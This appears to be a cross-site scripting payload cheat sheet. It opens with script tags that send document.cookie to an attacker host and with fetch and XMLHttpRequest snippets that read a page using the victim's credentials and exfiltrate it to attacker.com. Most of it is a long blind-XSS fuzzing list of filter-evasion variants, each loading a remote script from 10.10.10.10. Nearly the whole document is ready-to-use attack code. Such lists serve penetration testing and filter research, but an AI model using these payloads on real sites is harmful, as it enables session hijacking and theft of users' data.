Cross Site Scripting (XSS)

<script>document.location='http://<attacker>/'+document.cookie</script>
<script>new Image().src='http://<attacker>/'+document.cookie</script>

Data Exifiltration

// Fetch GET
fetch('https://test.com', { credentials: 'include' }).then(r => r.text()).then(d => fetch(`https://attacker.com/${btoa(d)}`, { mode: 'no-cors' }));

// Fetch POST
fetch('https://test.com', { credentials: 'include' }).then(r => r.text()).then(d => fetch('https://attacker.com', { method: 'POST', mode: 'no-cors', body: d }));

// XMLHttpRequest GET
var r = new XMLHttpRequest();
r.open('GET', 'https://test.com', true);
r.withCredentials = true;
r.onload = () => { 
    var s = new XMLHttpRequest();
    s.open('GET', `https://attacker.com/${btoa(r.responseText)}`, true);
    s.send();
}
r.send();

// XMLHttpRequest POST
var r = new XMLHttpRequest();
r.open('GET', 'https://test.com', true);
r.withCredentials = true;
r.onload = () => { 
    var s = new XMLHttpRequest();
    s.open('POST', 'https://attacker.com/', true);
    s.send(r.responseText);
};
r.send();

Bypasses

Base64 encoding

eval(atob("YWxlcnQoMSk7"));

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#filter-bypass-and-exotic-payloads

Blind XSS

Blind XSS intruder

blind_xss_intruder.txt

<script\x20type="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x3Etype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x0Dtype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x09type="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x0Ctype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x2Ftype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x0Atype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
'`"><\x3Cscript>javascript:$.getScript("http://10.10.10.10/xss")</script>        
'`"><\x00script>javascript:$.getScript("http://10.10.10.10/xss")</script>
<img src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></img>
<audio src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></audio>
<video src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></video>
<body src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></body>
<image src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></image>
<object src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></object>
<script src=1 href=1 onerror="javascript:$.getScript("http://10.10.10.10/xss")"></script>
<svg onResize svg onResize="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onUnload>
<body onLoad body onLoad="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></frameset onFocus>
<applet onError applet onError="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onMouseMove>
<body onResize body onResize="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onResize>
<object onError object onError="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></object onError>
<body onPopState body onPopState="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></svg onunload>
<applet onerror applet onerror="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onkeyup>
<body onunload body onunload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onunload>
<iframe onload iframe onload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></iframe onload>
<body onload body onload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onload>
<html onmouseover html onmouseover="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></iframe src>
<svg onload svg onload="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></html onmousemove>
<body onblur body onblur="javascript:javascript:$.getScript("http://10.10.10.10/xss")"></body onblur>
\x3Cscript>javascript:$.getScript("http://10.10.10.10/xss")</script>
'"`><script>/* *\x2Fjavascript:$.getScript("http://10.10.10.10/xss")// */</script>
<script>javascript:$.getScript("http://10.10.10.10/xss")</script\x0D
<script>javascript:$.getScript("http://10.10.10.10/xss")</script\x0A
<script>javascript:$.getScript("http://10.10.10.10/xss")</script\x0B
<script charset="\x22>javascript:$.getScript("http://10.10.10.10/xss")</script>
<!--\x3E<img src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")> -->
--><!-- ---> <img src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")> -->
`"'><img src='#\x27 onerror=javascript:$.getScript("http://10.10.10.10/xss")>
<a href="javascript\x3Ajavascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:$.getScript("http://10.10.10.10/xss")//';</script></p>
<a href="javas\x00cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:$.getScript("http://10.10.10.10/xss")// */</script>
<script>/* *\x00/javascript:$.getScript("http://10.10.10.10/xss")// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:$.getScript("http://10.10.10.10/xss")//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:$.getScript("http://10.10.10.10/xss")//></style>
<style></style\x09<img src="about:blank" onerror=javascript:$.getScript("http://10.10.10.10/xss")//></style>
<style></style\x20<img src="about:blank" onerror=javascript:$.getScript("http://10.10.10.10/xss")//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:$.getScript("http://10.10.10.10/xss")//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:$.getScript("http://10.10.10.10/xss");/*';">DEF 
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:$.getScript("http://10.10.10.10/xss");/*';">DEF 
<script>if("x\\xE1\x96\x89".length==2) { javascript:$.getScript("http://10.10.10.10/xss");}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:$.getScript("http://10.10.10.10/xss");}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:$.getScript("http://10.10.10.10/xss");}</script>
'`"><\x3Cscript>javascript:$.getScript("http://10.10.10.10/xss")</script>
'`"><\x00script>javascript:$.getScript("http://10.10.10.10/xss")</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")>
"'`><\x00img src=xxx:x onerror=javascript:$.getScript("http://10.10.10.10/xss")>
<script src="data:text/plain\x2Cjavascript:$.getScript("http://10.10.10.10/xss")"></script>
<script src="data:\xD4\x8F,javascript:$.getScript("http://10.10.10.10/xss")"></script>
<script src="data:\xE0\xA4\x98,javascript:$.getScript("http://10.10.10.10/xss")"></script>
<script src="data:\xCB\x8F,javascript:$.getScript("http://10.10.10.10/xss")"></script>
<script\x20type="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x3Etype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x0Dtype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x09type="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x0Ctype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x2Ftype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
<script\x0Atype="text/javascript">javascript:$.getScript("http://10.10.10.10/xss");</script>
ABC<div style="x\x3Aexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:expression\x5C(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:expression\x00(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:exp\x00ression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:exp\x5Cression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x0Aexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x09expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xC2\xA0expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x0Dexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x0Cexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x20expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x00expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\x0Bexpression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:$.getScript("http://10.10.10.10/xss")">DEF
<a href="\x0Bjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:$.getScript("http://10.10.10.10/xss")" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x22onerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x0Bonerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x0Donerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x2Fonerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x09onerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x0Conerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x00onerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x27onerror=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x \x20onerror=javascript:$.getScript("http://10.10.10.10/xss")>
"`'><script>\x3Bjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x0Djavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xEF\xBB\xBFjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x81javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x84javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE3\x80\x80javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x09javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x89javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x85javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x88javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x00javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\xA8javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x8Ajavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE1\x9A\x80javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x0Cjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x2Bjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>-javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x0Ajavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\xAFjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x7Ejavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x87javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x81\x9Fjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\xA9javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xC2\x85javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xEF\xBF\xAEjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x83javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x8Bjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xEF\xBF\xBEjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x80javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x21javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x82javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE2\x80\x86javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xE1\xA0\x8Ejavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x0Bjavascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\x20javascript:$.getScript("http://10.10.10.10/xss")</script>
"`'><script>\xC2\xA0javascript:$.getScript("http://10.10.10.10/xss")</script>
"/><img/onerror=\x0Bjavascript:$.getScript("http://10.10.10.10/xss")\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:$.getScript("http://10.10.10.10/xss")\x22src=xxx:x />
"/><img/onerror=\x09javascript:$.getScript("http://10.10.10.10/xss")\x09src=xxx:x />
"/><img/onerror=\x27javascript:$.getScript("http://10.10.10.10/xss")\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:$.getScript("http://10.10.10.10/xss")\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:$.getScript("http://10.10.10.10/xss")\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:$.getScript("http://10.10.10.10/xss")\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:$.getScript("http://10.10.10.10/xss")\x60src=xxx:x />
"/><img/onerror=\x20javascript:$.getScript("http://10.10.10.10/xss")\x20src=xxx:x />
<script\x2F>javascript:$.getScript("http://10.10.10.10/xss")</script>
<script\x20>javascript:$.getScript("http://10.10.10.10/xss")</script>
<script\x0D>javascript:$.getScript("http://10.10.10.10/xss")</script>
<script\x0A>javascript:$.getScript("http://10.10.10.10/xss")</script>
<script\x0C>javascript:$.getScript("http://10.10.10.10/xss")</script>
<script\x00>javascript:$.getScript("http://10.10.10.10/xss")</script>
<script\x09>javascript:$.getScript("http://10.10.10.10/xss")</script>
`"'><img src=xxx:x onerror\x0B=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x onerror\x00=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x onerror\x0C=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x onerror\x0D=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x onerror\x20=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x onerror\x0A=javascript:$.getScript("http://10.10.10.10/xss")>
`"'><img src=xxx:x onerror\x09=javascript:$.getScript("http://10.10.10.10/xss")>
<script>javascript:$.getScript("http://10.10.10.10/xss")<\x00/script>
<img src=# onerror\x3D"javascript:$.getScript("http://10.10.10.10/xss")" >
<input onfocus=javascript:$.getScript("http://10.10.10.10/xss") autofocus>
<input onblur=javascript:$.getScript("http://10.10.10.10/xss") autofocus><input autofocus>
<video poster=javascript:javascript:$.getScript("http://10.10.10.10/xss")//
<body onscroll=javascript:$.getScript("http://10.10.10.10/xss")><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:$.getScript("http://10.10.10.10/xss")><input></form><button form=test onformchange=javascript:$.getScript("http://10.10.10.10/xss")>X
<video><source onerror="javascript:javascript:$.getScript("http://10.10.10.10/xss")">
<video onerror="javascript:javascript:$.getScript("http://10.10.10.10/xss")"><source>
<form><button formaction="javascript:javascript:$.getScript("http://10.10.10.10/xss")">X
<body oninput=javascript:$.getScript("http://10.10.10.10/xss")><input autofocus>
<math href="javascript:javascript:$.getScript("http://10.10.10.10/xss")">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:$.getScript("http://10.10.10.10/xss")">CLICKME</maction> </math>
<frameset onload=javascript:$.getScript("http://10.10.10.10/xss")>
<table background="javascript:javascript:$.getScript("http://10.10.10.10/xss")">
<!--<img src="--><img src=x onerror=javascript:$.getScript("http://10.10.10.10/xss")//">
